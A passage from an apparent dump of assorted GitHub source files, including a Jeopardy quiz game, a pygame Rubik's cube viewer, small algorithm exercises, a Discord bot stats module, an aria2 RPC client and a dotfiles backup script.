response\n listofquestions = zresp.json()\n\n # run the game by loopoing over the results\n for jquestion in listofquestions:\n # each time through loop, pose Q to player\n print(f\"Alex says: {jquestion['question']}\")\n playeranswer = input(f\"\\tType your Answer --> \")\n \n # user can respond by typing input (normalize to lowercase) \n if playeranswer.lower() == jquestion['answer'].lower():\n print(f\"Alex says: That's right, you add {jquestion['value']} to your score\")\n # alter playerscore counter, increase by the question's point value\n playerscore = playerscore + jquestion['value']\n else: \n print(f\"Alesx says:Not quite right? The answer were were looking for was {jquestion['answer']}\")\n\n # after 10 rounds, show the player's score\n print(f\"Alex says: Let's see how you did.\\nLooks like your score is {playerscore}\")\n\n # if their score is higher than and of those in highscore.txt, ask for then write palyer's intials, and their score, to highscore.txt\n with open(\"jeopardyhighscores.txt\") as jhs:\n highscorelist = jhs.readlines()\n\n # sore the data taken from the file\n highscorelist.sort()\n\n for score in highscorelist:\n if playerscore > int(score.rstrip(\"\\n\")):\n print(\"looks like a high score\")\n highscorelist.remove(score)\n highscorelist.append(str(playerscore))\n break\n\n with open(\"jeopardyhighscores.txt\", \"w\") as jhs:\n for score in highscorelist:\n jhs.write(score.rstrip(\"\\n\")+\"\\n\")\n\nif __name__ == \"__main__\":\n main()\n\n \n","repo_name":"BruceBAWest/pyb06292020","sub_path":"jeopardy/jeopardygame.py","file_name":"jeopardygame.py","file_ext":"py","file_size_in_byte":2083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22748274741","text":"from .render import Canvas, CubeDrawable, SkewbDrawable\nfrom . import cube, skewb\nfrom .perm import P\nimport pygame as pg\nimport time\nimport math\nimport threading\nimport collections\n\n\nclass InteractiveCanvas(Canvas):\n def __init__(self):\n self.surface = None\n\n def set_size(self, size):\n self.surface = pg.Surface(size)\n self.surface.fill((0, 0, 0))\n\n def draw_rect(self, xy, color):\n x0, y0, x1, y1 = xy\n w = x1 - x0 + 1\n h = y1 - y0 + 1\n pg.draw.rect(self.surface, color, (x0, y0, w, h))\n\n def draw_poly(self, points, color):\n pg.draw.polygon(self.surface, color, points)\n\n def get_surface(self):\n return self.surface\n\n\nclass Scene:\n def update(self, events, dt):\n pass\n\n def render(self, screen):\n pass\n\nclass DrawableScene(Scene):\n def __init__(self, drawable, initial_state = P(dict())):\n self.drawable = drawable\n self.state = initial_state\n self.initial_state = initial_state\n\n def render(self, screen):\n canvas = InteractiveCanvas()\n self.drawable.render(self.state, canvas)\n screen.blit(pg.transform.scale(canvas.get_surface(), screen.get_size()), (0, 0))\n\nclass CubeScene(DrawableScene):\n def __init__(self, initial_state = P(dict())):\n super().__init__(CubeDrawable, initial_state=initial_state)\n\nclass InteractiveCubeScene(CubeScene):\n def update(self, events, dt):\n for event in events:\n if event.type == pg.KEYDOWN:\n turn = {\n 30: cube.U,\n 40: cube.D,\n 46: cube.L,\n 27: cube.R,\n 41: cube.F,\n 56: cube.B,\n 58: cube.M,\n 26: cube.E,\n 39: cube.S,\n 53: cube.X,\n 29: cube.Y,\n 52: cube.Z\n }.get(event.scancode, None)\n if turn is None:\n continue\n\n if pg.key.get_mods() & pg.KMOD_SHIFT != 0:\n turn **= -1\n\n self.state @= turn\n\nclass InteractiveSkewbScene(DrawableScene):\n def __init__(self, initial_state = P(dict())):\n super().__init__(SkewbDrawable, initial_state=initial_state)\n\n def update(self, events, dt):\n for event in events:\n if event.type == pg.KEYDOWN:\n turn = {\n 30: skewb.U,\n 46: skewb.L,\n 27: skewb.R,\n 56: skewb.B,\n }.get(event.scancode, None)\n if turn is None:\n continue\n\n if pg.key.get_mods() & pg.KMOD_SHIFT != 0:\n turn **= -1\n\n self.state @= turn\n\n\nclass PlaybackCubeScene(CubeScene):\n def __init__(self, sequence, initial_state = P(dict()), frametime = 1):\n super().__init__(initial_state)\n self.sequence = list(sequence)\n self.initial_state = initial_state\n self.time = 0\n self.i = 0\n self.frametime = frametime\n\n def update(self, events, dt):\n self.time += dt\n if self.time > self.frametime:\n self.time -= self.frametime\n if self.i >= len(self.sequence):\n self.state = self.initial_state\n self.i = 0\n else:\n self.state @= self.sequence[self.i]\n self.i += 1\n\nclass StepCubeScene(CubeScene):\n def __init__(self, sequence, initial_state = P(dict())):\n super().__init__(initial_state)\n self.sequence = list(sequence)\n self.i = -1\n\n def update(self, events, dt):\n for event in events:\n if event.type == pg.KEYDOWN:\n if event.scancode == 113 or \\\n (pg.key.get_mods() & pg.KMOD_SHIFT != 0 and event.scancode == 65):\n # step back\n if self.i >= 0:\n self.state @= (self.sequence[self.i] ** -1)\n self.i -= 1\n elif event.scancode in (65, 114):\n # step fwd\n if (self.i + 1) < len(self.sequence):\n self.i += 1\n self.state @= self.sequence[self.i]\n\nclass StdinCubeScene(CubeScene):\n def __init__(self, initial_state = P(dict())):\n super().__init__(initial_state)\n self.q = collections.deque()\n self.lock = threading.Lock()\n\n def stdin_reader(q, lock):\n while True:\n try:\n inputs = list(input())\n except EOFError:\n continue\n for s in inputs:\n s = s.upper()\n if s in \"UDLRFBMESXYZ'\":\n with lock:\n q.append(s)\n\n self.reader = threading.Thread(target=stdin_reader, args=(self.q, self.lock), daemon=True)\n self.reader.start()\n\n def update(self, events, dt):\n with self.lock:\n for event in events:\n if event.type == pg.KEYDOWN and event.scancode == 65:\n # spacebar pressed\n self.state = self.initial_state\n while len(self.q) > 0:\n s = self.q.popleft()\n t = getattr(cube, s)\n if len(self.q) > 0 and self.q[0] == '\\'':\n t **= -1\n self.q.popleft()\n self.state @= t\n\n\ndef run(scene):\n\n W, H = win_w, win_h = 640, 480\n\n pg.init()\n\n win_offset_x = win_offset_y = 0\n\n W_FLAGS = (pg.HWSURFACE | pg.DOUBLEBUF | pg.RESIZABLE)\n\n window = pg.display.set_mode((win_w, win_h), W_FLAGS)\n screen = pg.Surface((W, H), pg.SRCALPHA, 32)\n\n font = pg.font.SysFont(None, 24) # default font\n frames = 0\n fpstext = font.render(f\"{frames} FPS\", True, (255, 128, 0))\n running_t = time.time()\n\n FPS = 60\n clock = pg.time.Clock()\n running = True\n\n try:\n while running:\n dt = clock.tick(FPS) / 1000 # milliseconds\n current_t = time.time()\n if current_t - running_t > 1:\n fpstext = font.render(f\"{frames} FPS\", True, (255, 128, 0))\n running_t += 1\n frames = 0\n\n events = []\n for event in pg.event.get():\n if event.type == pg.QUIT:\n running = False\n elif event.type == pg.VIDEORESIZE:\n # the window has been resized\n win_w, win_h = event.size\n pg.display.set_mode((win_w, win_h), W_FLAGS)\n\n # keep aspect ratio of screen\n if (win_w / win_h) < (W / H):\n tmp = int(H / W * win_w)\n win_offset_x = 0\n win_offset_y = (win_h - tmp) // 2\n win_h = tmp\n else:\n tmp = int(W / H * win_h)\n win_offset_x = (win_w - tmp) // 2\n win_offset_y = 0\n win_w = tmp\n else:\n events.append(event)\n\n scene.update(events, dt)\n\n # render stuff on screen\n screen.fill((0, 0, 0)) # clear\n screen.blit(fpstext, (0, 0))\n\n scene.render(screen)\n\n # fit screen to window\n window.blit(pg.transform.scale(screen, (win_w, win_h)), (win_offset_x, win_offset_y))\n pg.display.flip() # update window\n frames += 1\n except KeyboardInterrupt:\n pass\n\n pg.quit()\n\nif __name__ == \"__main__\":\n run(InteractiveCubeScene())\n","repo_name":"thamma/SmartCube","sub_path":"cube_implementation/interactive.py","file_name":"interactive.py","file_ext":"py","file_size_in_byte":7763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2327371078","text":"import random\ndef solution(A):\n b = A\n i = 0\n while True:\n if b[i] <= 1 and i == len(b)-1:\n break\n t = 0\n if b[i]%2 == 0:\n t = b[i]//2\n else:\n t = (b[i]-1)//2\n b[i] = b[i] - 2*t\n if i+1 < len(b):\n b[i+1] += t\n else:\n b.append(t)\n i += 1\n print(b, len(b))\n return sum(b)\n\na = [0 for _ in range(100000)]\nprint(solution(a))\n# print(solution([1000000]))","repo_name":"lebahoang/cp","sub_path":"leetcode/wnd.py","file_name":"wnd.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9753793869","text":"# class Solution(object):\n# def pivotIndex(self, nums):\n# \"\"\"\n# :type nums: List[int]\n# :rtype: int\n# \"\"\"\n# sumL = 0\n# sumR = sum(nums)\n# for i in range(len(nums)):\n# sumR -= nums[i]\n# if sumL == sumR:\n# return i\n# sumL += nums[i]\n# return -1\n\n# nums = [1,7,3,6,5,6]\n# sol = Solution()\n# print(sol.pivotIndex(nums))\n\n\n\"\"\"\nAn index is said to be pivot when the sum of the array to the left is the same as the sum of the array to \nthe right.\n\"\"\"\n\nclass Solution:\n def pivotIndex(self, nums):\n sumLeft = 0\n lst_total = sum(nums)\n sumRight = lst_total\n \n for i in range(len(nums)):\n sumRight -= nums[i]\n if sumLeft == sumRight:\n return i\n sumLeft += nums[i]\n return -1\n\nnums = [1,7,3,6,5,6]\nsol = Solution()\nprint(sol.pivotIndex(nums))\n\n","repo_name":"SeunFashina002/DataStructures_and_Algorithm","sub_path":"challenges/pivot_index.py","file_name":"pivot_index.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"11531313582","text":"class banco():\n\n institucion_perteneciente = None\n cajero_automatico = None\n atencion_cliente = None\n personal = None\n sala_de_espera = None\n escala = None\n cajas = None\n escaleras = None\n banca_movil = None\n prestamos = None\n \n \n def __init__(self):\n print(\"Clase banco.\")\n \n def invertir (self):\n print(\"Metodo invertir\")\n \n def prestar (self):\n print(\"Metodo prestar\")\n \n def administrar (self):\n print(\"Metodo administrar\")\n \n def financiar (self):\n print(\"Metodo financiarr\")\n \n def asesorar (self):\n print(\"Metodo asesorar\")\n\n\nbbva = banco()\nbbva.institucion_perteneciente = \"BBVA\"\nbbva.cajero_automatico = \"si\"\nbbva.atencion_cliente = \"si\"\nbbva.personal = \"si\"\nbbva.sala_de_espera = \"si\"\nbbva.escala = \"Dos pisos\"\nbbva.cajas = \"si\"\nbbva.escaleras = \"si\"\nbbva.banca_movil = \"si\"\nbbva.prestamos = \"si\"\n\nprint(bbva.institucion_perteneciente)\nprint(bbva.cajero_automatico)\nprint(bbva.atencion_cliente)\nprint(bbva.personal)\nprint(bbva.sala_de_espera)\nprint(bbva.escala)\nprint(bbva.cajas)\nprint(bbva.escaleras)\nprint(bbva.banca_movil)\nprint(bbva.prestamos)\n\nbbva.administrar()\nbbva.asesorar()\nbbva.financiar()\nbbva.invertir()\nbbva.prestar()","repo_name":"FernandoLopezTorrez/poo-1720110288","sub_path":"semana2/banco.py","file_name":"banco.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28733053895","text":"# Important modules to import\nimport numpy as np\nimport pandas as pd\nimport random\nfrom random import randint\nimport time\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\n# Orders the similarty expressions from smallest to largest\ndef sort_expressions(s):\n s = np.array(s)\n order = np.argsort(s)\n #Sorts s into order smallest to largest\n s.sort(axis=0)\n n=np.size(s)\n mu=np.array(np.zeros(n+1))\n mu[0]=s[0]\n for i in range(1, n):\n mu[i]=s[i]-s[i-1]\n #print(mu[i])\n mu[n]=1-s[-1] \n return [s, mu, order]\n\n# Creates the truth table\ndef create_truth_table(variables, formula, s):\n variables3=[]\n s_new = []\n \n# Only considers similarity expressions that are invloved in sentence theta\n for i in range(0,len(variables)):\n if any(variables[i] in s for s in formula):\n variables3.append(variables[i])\n s_new.append(s[i])\n [s, mu, order] = sort_expressions(s_new)\n n=len(variables3)\n variables2=[]\n order = order[::-1]\n \n \n for i in range(0,n):\n variables2.append(variables3[order[i]])\n m = np.ones((n+1,n))\n m=np.tril(m, -1)\n rev_mu = mu[::-1]\n m=np.asarray(m)\n df = pd.DataFrame(m,columns= variables2)\n df.insert(loc=0, column='S_val', value = rev_mu)\n \n column_names=[]\n c=0\n \n# Loops through the entire formula\n for i in range(0,len(formula)):\n # Checks in a sub bracket\n if formula[i][0]!='or':\n #Creates column name for header of data frame\n seperator = ' '\n column_names.append(seperator.join(formula[i]))\n sval=[]\n zero=False\n #Looking through individual formula\n for j in range(0, len(formula[i])):\n if formula[i][j]=='not':\n zero=True\n # Goes onto next j value if zero is true\n continue\n elif formula[i][j]=='and':\n continue\n else:\n if zero==True:\n sval.append([formula[i][j],0])\n zero=False\n else:\n sval.append([formula[i][j],1])\n \n if len(formula[i])==1:\n truth =np.array(np.zeros(len(df)))\n #When formula length =1 (ie when only one value in subbracket), no need to calculate values\n for k in range(0,len(df)):\n truth[k]=df[sval[0][0]][k]\n \n # Number in sub bracket is greater than 1\n else:\n truth =np.array(np.zeros(len(df)))\n for l in range(0,len(df)):\n istrue = True\n for k in range(0,len(sval)):\n if df[sval[k][0]][l]==sval[k][1]:\n istrue=True\n else:\n istrue=False\n break\n if istrue==True:\n truth[l]=1\n else:\n truth[l]=0\n \n df[column_names[c]]=truth\n c=c+1;\n \n # Now bring all togther by evaluating all rows - all joined by an 'or'\n truth =np.array(np.zeros(len(df)))\n seperator = ') or ('\n column_name_joint = '(' + seperator.join(column_names) + ')'\n for i in range(0,len(df)):\n istrue = True\n for j in range(0,len(column_names)):\n if df[column_names[j]][i]==1:\n istrue=True\n break\n else:\n istrue=False\n if istrue==True:\n truth[i]=1\n else:\n truth[i]=0\n \n df[column_name_joint]=truth\n sval_sum = evaluation(df,column_name_joint)\n return df, sval_sum\n \n\n#Evaluation function \ndef evaluation(df,column_name_joint):\n #Need to find the sum of svals\n sval_sum=0\n for i in range(0,len(df)):\n if df[column_name_joint][i]==1:\n sval_sum=sval_sum+df['S_val'][i]\n sval_sum = round(sval_sum,4)\n return sval_sum\n\n\n# Formula generator that generates a formula where n defines the number of similarity expressions \n# k defines the length of the formula\n# or's are between sub_brackets, and's are in sub_brackets\ndef new_formula_generator(n,k):\n [variables, s]= create_variables(n)\n connective_list = ['and', 'or']\n variable_list = variables\n formula=[]\n connective=[]\n \n # Number of connectives is k-1\n for j in range(0,k-1):\n connective.append(random.choice(connective_list))\n \n #Create an empty sub brakcket\n sub_bracket=[]\n \n for i in range(0,k): \n # Decide on whether a 'not' is present or not\n if randint(0,1)==1:\n not_present=True\n else:\n not_present=False \n s_value = random.choice(variable_list)\n \n # Keep iterating through s_value if in formula subbracket already\n while (s_value in sub_bracket)==True:\n # Stops loop from getting stuck if k>n\n if all(x==connective[0] for x in connective)==False:\n s_value = random.choice(variable_list)\n else:\n break\n \n# Checks for 'not's\n if not_present==True:\n #if first loop through j\n sub_bracket.append('not')\n \n sub_bracket.append(s_value)\n \n if i!=(k-1):\n \n if connective[i]=='and':\n sub_bracket.append(connective[i])\n \n elif connective[i]=='or':\n # Close bracket and add to formula\n formula.append(sub_bracket)\n # Add connective on its own\n formula.append([connective[i]])\n sub_bracket=[]\n \n else:\n formula.append(sub_bracket)\n \n return [formula, variables, s]\n \n\n\ndef create_variables(n):\n# Initialise variables and vectors\n num_variables=n\n s=[]\n variables=[]\n \n for i in range(0,num_variables):\n s.append(round(random.uniform(0.001, 0.999),4))\n variables.append('s'+str(i+1))\n \n return variables, s\n\n\n\ndef analysis(n,k):\n # Average time over 100 attempts of n or k\n time2=[]\n \n for p in range(0,100):\n start_time = time.time()\n formula, variables, s= new_formula_generator(n,k)\n df, sval_sum = create_truth_table(variables, formula, s)\n end_time = time.time()\n time2.append(end_time-start_time)\n \n time_taken= np.mean(time2)\n return df, formula, sval_sum, time_taken, s\n \n \n# Code to run analysis once\ndef run_once(n,k):\n formula, variables, s= new_formula_generator(n,k)\n df, sval_sum = create_truth_table(variables, formula, s)\n return formula, variables, df, sval_sum\n \n \n# Code for testing a specific formula\ndef test():\n formula = [['not','s1','and','not','s2','and','not','s3']]\n variables = ['s1','s2','s3','s4','s5']\n s = [0.75,0.3,0.12, 0.33, 0.98]\n df, sval_sum = create_truth_table(variables, formula, s)\n return formula, variables, df, sval_sum, s \n\n\n\nif __name__ == \"__main__\": \n #Seaborn for graphs\n sns.set()\n \n \n ###### k=15, n varied ######\n total_time=[]\n k=5\n n_vec=[]\n for n in range(5,100):\n df, formula, sval_sum, time_taken, s = analysis(n,k)\n n_vec.append(n)\n total_time.append(time_taken)\n print(n)\n \n plt.xlabel('Number of similarity values (n)')\n plt.ylabel('Computational Time (s)')\n plt.scatter(n_vec, total_time,marker=\"+\") \n plt.plot(np.unique(n_vec), np.poly1d(np.polyfit(n_vec, total_time, 2))(np.unique(n_vec)), 'r', linewidth=3.0)\n plt.show() \n \n ###### ######\n \n # Fixed number of similarity expressions\n ###### n=1000, k varied ######\n total_time=[]\n n=40\n k_vec=[]\n for k in range(1,100):\n df, formula, sval_sum, time_taken, s = analysis(n,k*10)\n k_vec.append(k*10)\n total_time.append(time_taken)\n print(k)\n plt.figure()\n plt.xlabel('Length of Formula (k)')\n plt.ylabel('Computational Time (s)')\n plt.scatter(k_vec, total_time,marker=\"+\") \n plt.plot(np.unique(k_vec), np.poly1d(np.polyfit(k_vec, total_time, 2))(np.unique(k_vec)), 'r',linewidth=3.0)\n plt.show()\n \n ###### ######\n \n # Test a specific formula \n formula, variables, df, sval_sum, s = test()\n \n ","repo_name":"hh15160/thresholdsimilaritylogic","sub_path":"TotalDependence.py","file_name":"TotalDependence.py","file_ext":"py","file_size_in_byte":8610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25426640398","text":"#!/usr/bin/python3\n# https://leetcode.com/problems/is-subsequence/\n\n\ndef isSubsequence(s: str, t: str, i: int, j: int) -> bool:\n if i == 0:\n return True\n if j == 0:\n return False\n\n if s[i - 1] == t[j - 1]:\n return isSubsequence(s, t, i - 1, j - 1)\n\n return isSubsequence(s, t, i, j - 1)\n\n\nif __name__ == \"__main__\":\n testcase = (\n {\n \"s\": \"abc\",\n \"t\": \"ahbgdc\",\n \"output\": True\n },\n {\n \"s\": \"axc\",\n \"t\": \"ahbgdc\",\n \"output\": False\n },\n {\n \"s\": \"AXY\",\n \"t\": \"ADXCPY\",\n \"output\": True\n },\n {\n \"s\": \"AXY\",\n \"t\": \"YADXCP\",\n \"output\": False\n },\n {\n \"s\": \"gksrek\",\n \"t\": \"geeksforgeeks\",\n \"output\": True\n },\n )\n\n for test in testcase:\n print(isSubsequence(test[\"s\"], test[\"t\"], len(test[\"s\"]), len(test[\"t\"])))\n","repo_name":"tahmid-tanzim/problem-solving","sub_path":"Dynamic_Programming/is-subsequence.py","file_name":"is-subsequence.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"15028152189","text":"class maxFlow:\r\n def __init__(self, num):\r\n self.Len = num\r\n self.L = [[0] * num for i in range(num)]\r\n\r\n def setL(self, a, b, x):\r\n self.L[a][b] = x\r\n\r\n def setLR(self, a, b, x):\r\n self.setL(a, b, x)\r\n self.setL(b, a, x)\r\n\r\n def setS(self, s, X, Y):\r\n for i in range(len(X)):\r\n self.setL(s, X[i], Y[i])\r\n\r\n def setSn(self, s, X, n):\r\n Y = [n for i in range(len(X))]\r\n self.setS(s, X, Y)\r\n\r\n def setT(self, t, X, Y):\r\n for i in range(len(X)):\r\n self.setL(X[i], t, Y[i])\r\n\r\n def setTn(self, t, X, n):\r\n Y = [n for i in range(len(X))]\r\n self.setT(t, X, Y)\r\n\r\n def getAns(self, t):\r\n return sum(self.L[t])\r\n\r\n def DFS(self, s, t):\r\n S = [[s, 0]]\r\n P = [0] * self.Len\r\n D = [0] * self.Len\r\n while S != []:\r\n k = S.pop()\r\n P[k[1]] = k[0]\r\n if self.L[k[0]][self.Len - 1] > 0:\r\n P[k[1] + 1] = self.Len - 1\r\n return P\r\n for i in range(self.Len):\r\n if D[i] == 0 and self.L[k[0]][i] > 0:\r\n S.append([i, k[1] + 1])\r\n D[i] = 1\r\n return False\r\n\r\n def exe(self):\r\n while True:\r\n P = self.DFS(0, T - 1)\r\n if P == False:\r\n break\r\n mi = self.L[P[1]][P[0]]\r\n Last = self.Len\r\n for i in range(2, Last):\r\n if P[i - 1] == self.Len - 1:\r\n Last = i\r\n break\r\n t = self.L[P[i - 1]][P[i]]\r\n if t < mi:\r\n mi = t\r\n for i in range(1, Last):\r\n self.L[P[i - 1]][P[i]] -= mi\r\n self.L[P[i]][P[i - 1]] += mi\r\n\r\nN, G, E = list(map(int, input().split()))\r\np = list(map(int, input().split()))\r\nab = [list(map(int, input().split())) for i in range(E)]\r\n\r\nT = N + 1\r\n\r\nm = maxFlow(T)\r\nfor i in ab:\r\n m.setLR(i[0], i[1], 1)\r\n\r\nm.setTn(-1, p, 1)\r\nm.exe()\r\n\r\nprint(m.getAns(-1))","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/abc010/D/4507486.py","file_name":"4507486.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"74904754471","text":"#!/usr/bin/env python3\n\nimport argparse\nimport xmlrpc.client\n\nparser = argparse.ArgumentParser(description='a script to control aria2 XML-RPC server')\nparser.add_argument('--rpc-method', nargs=None, default='addUri', help='Set RPC method.')\nparser.add_argument('--rpc-server', nargs=None, default='http://127.0.0.1:6800/rpc', help='Set XML-RPC server address.')\nparser.add_argument('--rpc-secret', nargs=None, default=None, help='Set RPC secret authorization token.')\n\nargs, other_options = parser.parse_known_args()\n\nsep_index = other_options.index('--')\nopt_args = dict((other_options[i].lstrip('--'), other_options[i+1]) for i in range(0, len(other_options[0:sep_index]), 2))\npos_args = other_options[sep_index+1:]\n\nparams = []\n\nif args.rpc_secret is not None:\n params.append('token:{0}'.format(args.rpc_secret))\n\nif args.rpc_method == 'addUri':\n params.append(pos_args)\nelif len(pos_args) > 0:\n params.append(pos_args[0])\n\nwith xmlrpc.client.ServerProxy(args.rpc_server) as proxy:\n getattr(proxy.aria2, args.rpc_method)(*params)\n","repo_name":"JaHIY/aria2rpc","sub_path":"aria2rpc.py","file_name":"aria2rpc.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11055409640","text":"\nfrom datetime import datetime\nimport time\n\nfrom discord.ext import commands\nimport psutil\nimport utility.discordembed as dmbd\n\nclass Information:\n\n def __init__(self, bot):\n self.bot = bot\n self.initialtime = time.time()\n self.totalmembers = set({})\n\n def getuptime(self):\n seconds = int(time.time() - self.initialtime)\n minutes = 0\n hours = 0\n days = 0\n\n if seconds > 86399:\n days = int(seconds/86400)\n seconds = seconds % 86400\n if seconds > 3599:\n hours = int(seconds/3600)\n seconds = seconds % 3600\n if seconds > 59:\n minutes = int(seconds/60)\n seconds = seconds % 60\n\n return \"{d}d {h}h {m}m {s}s\".format(d=days, h=hours, m=minutes, s=seconds)\n\n @staticmethod\n def getcpuusage():\n return psutil.Process().cpu_percent() / psutil.cpu_count()\n\n @staticmethod\n def getmemusage():\n return psutil.Process().memory_info().rss / (1024 ** 2)\n\n def gettotalusers(self):\n for x in self.bot.servers:\n for y in x.members:\n self.totalmembers.add(y.id)\n return len(self.totalmembers)\n\n @commands.command(pass_context=True)\n async def ping(self, ctx):\n pingpong = datetime.now() - ctx.message.timestamp\n pingpong = pingpong.microseconds / 1000\n second = await self.bot.say('*Recherche du ping en cours...*')\n heartbeat = second.timestamp - ctx.message.timestamp\n heartbeat = heartbeat.microseconds / 1000\n description = (\n ':ping_pong: `' + str(pingpong) + ' ms`\\n' +\n ':blue_heart: `' + str(heartbeat) + ' ms`'\n )\n em = dmbd.newembed(ctx.message.author, d=description)\n await self.bot.edit_message(second, new_content='',embed=em)\n\n @commands.command(pass_context=True)\n async def bstats(self, ctx):\n author = ctx.message.author\n title = 'Stats pour ' + self.bot.user.name\n desc = 'Ne-e-e-e-e-e regarde pas mes stats... Trouduc!'\n url = \"https://github.com/dearvoodoo/\"\n # trello = \"Add Later\"\n inviteurl = (\n \"http://dear-voodoo.com\"\n )\n\n supporturl = \"https://discord.gg/mZHrDXW\"\n\n em = dmbd.newembed(author, title, desc, url)\n em.add_field(name='Utilisateur(s) Total', value=self.gettotalusers())\n em.add_field(name='Serveur(s) avec RED', value=len(self.bot.servers))\n em.add_field(name='Utilisateur(s) sur ce serveur', value=len(ctx.message.server.members))\n em.add_field(name='Uptime', value=self.getuptime())\n em.add_field(name='CPU', value=\"{0:.2f}%\".format(self.getcpuusage()))\n em.add_field(name='Mémoire', value=\"{0:.2f} MB\".format(self.getmemusage()))\n # em.add_field(name='Trello', value='[Trello Page]({})'.format(trello))\n em.add_field(name='Le DEV', value='[Clique sur moi :)]({})'.format(inviteurl))\n em.add_field(name='Support', value='[Lien Discord]({})'.format(supporturl))\n\n await self.bot.say(embed=em)\n\n @commands.command()\n async def uptime(self):\n await self.bot.say(\"```\" + self.getuptime() + \"```\")\n\n\ndef setup(bot):\n bot.add_cog(Information(bot))\n","repo_name":"Krystool/Alastor-Bot","sub_path":"modules/info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":3241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31260459626","text":"#!/usr/bin/env python3\n\"\"\" Util for backup / deploy dotfiles.\n\"\"\"\n\nimport os\nimport re\nimport sys\nimport shutil\nimport platform\nimport datetime\nfrom subprocess import run, PIPE\nimport yaml\n\nHOME_DIR = os.getenv(\"HOME\")\nHOME_PIP = \"[_HOME_]\"\nTHIS_DIR = os.path.dirname(os.path.realpath(__file__))\nSYS_NAME = platform.system().lower()\nCOLORS = {\n \"x\": \"\\x1b[0m\",\n \"w\": \"\\x1b[37m%s\\x1b[0m\",\n \"_\": \"\\x1b[90m%s\\x1b[0m\",\n \"r\": \"\\x1b[31m%s\\x1b[0m\",\n \"y\": \"\\x1b[33m%s\\x1b[0m\",\n \"g\": \"\\x1b[32m%s\\x1b[0m\",\n \"b\": \"\\x1b[34m%s\\x1b[0m\",\n \"m\": \"\\x1b[35m%s\\x1b[0m\",\n \"c\": \"\\x1b[36m%s\\x1b[0m\",\n}\n\nwith open(os.path.join(THIS_DIR, \"dots.yml\")) as fs:\n try:\n CONF = list(yaml.safe_load_all(fs))[0]\n except yaml.YAMLError as err:\n print(COLORS[\"r\"] % \" ✘ Fucked up:\")\n print(err)\n sys.exit()\nPATHS = CONF['sources']\nARCHIVE = CONF['archive_dir']\nDOTS_DIR = os.path.join(THIS_DIR, \"dotfiles\")\n\n\ndef backup():\n \"\"\" Parse listed paths and copy it's content to this repo\n with storing previous version.\n \"\"\"\n\n if not os.path.exists(DOTS_DIR):\n os.makedirs(DOTS_DIR)\n\n # Copying files\n clone_targets()\n\n # Git commit\n commit_changes()\n\n # Archive\n archive()\n\n\ndef clone_targets():\n \"\"\" Clone files listed in dots.yml in ./dotfiles\n \"\"\"\n print(COLORS[\"b\"] % \"\\n → Copying files...\")\n for name, path in PATHS.items():\n print(\" '%s' to '%s'\" % (path, os.path.join(\"dotfiles\", name)))\n target_path = path.replace(\"~\", HOME_DIR)\n backup_path = os.path.join(DOTS_DIR, name)\n\n shutil.rmtree(backup_path, True)\n\n if os.path.isdir(target_path):\n clone_dir(target_path, backup_path)\n elif os.path.isfile(target_path):\n try:\n safe_clone_file(target_path, backup_path)\n except OSError:\n continue\n\n print(COLORS[\"g\"] % \" ✓ Done\")\n\n\ndef clone_dir(src_path, dest_dir):\n \"\"\" Clone dir recursively.\n \"\"\"\n if not os.path.exists(dest_dir):\n os.makedirs(dest_dir)\n for (dirpath, dirnames, filenames) in os.walk(src_path):\n rel_path = os.path.relpath(dirpath, src_path)\n # Create dirs\n for dirname in dirnames:\n dirname = os.path.join(dest_dir, rel_path, dirname)\n dirname = os.path.abspath(dirname)\n if not os.path.exists(dirname):\n os.makedirs(dirname)\n # Clone files\n for filename in filenames:\n src = os.path.join(dirpath, filename)\n dest = os.path.join(dest_dir, rel_path, filename)\n dest = os.path.abspath(dest)\n try:\n safe_clone_file(src, dest)\n except OSError:\n continue\n\n\ndef safe_clone_file(src_path, dest_path):\n \"\"\" If file is text, read it, replace all home\n path occurances and write to dest path.\n If not text - just copy.\n \"\"\"\n with open(src_path) as file:\n try:\n normalized = file.read().replace(HOME_DIR, HOME_PIP)\n out = open(dest_path, \"w\")\n out.write(normalized)\n out.close()\n except ValueError:\n shutil.copy2(src_path, dest_path)\n except Exception as err:\n print(COLORS[\"r\"] % \" ✘ Fucked up with \", end=\"\")\n print(src_path)\n raise err\n\n\ndef commit_changes():\n \"\"\" Git commit.\n \"\"\"\n print(COLORS[\"b\"] % \"\\n → Git commit...\")\n git_status = run([\"git\", \"status\", \"--porcelain\"],\n stdout=PIPE).stdout.decode(\"utf-8\")\n for dif in git_status.split(\"\\n\"):\n dif_match = re.match(r\"^.(.+)\\s(.*)\", dif)\n if dif_match is None:\n continue\n if dif_match.group(1) == \"M\":\n print(COLORS[\"b\"] % (\" ~ \" + dif_match.group(2)))\n elif dif_match.group(1) == \"D\":\n print(COLORS[\"r\"] % (\" x \" + dif_match.group(2)))\n else:\n print(COLORS[\"_\"] % (\" ? \" + dif_match.group(2)))\n run([\"git\", \"add\", \".\"], stdout=PIPE)\n run([\"git\", \"commit\", \"-m\", \"'Backup'\"], stdout=PIPE)\n print(COLORS[\"g\"] % \" ✓ Done\")\n\n\ndef archive():\n \"\"\" Archive dotfiles\n \"\"\"\n if not ARCHIVE:\n return\n\n print(COLORS[\"b\"] % \"\\n → Create archive...\")\n time = 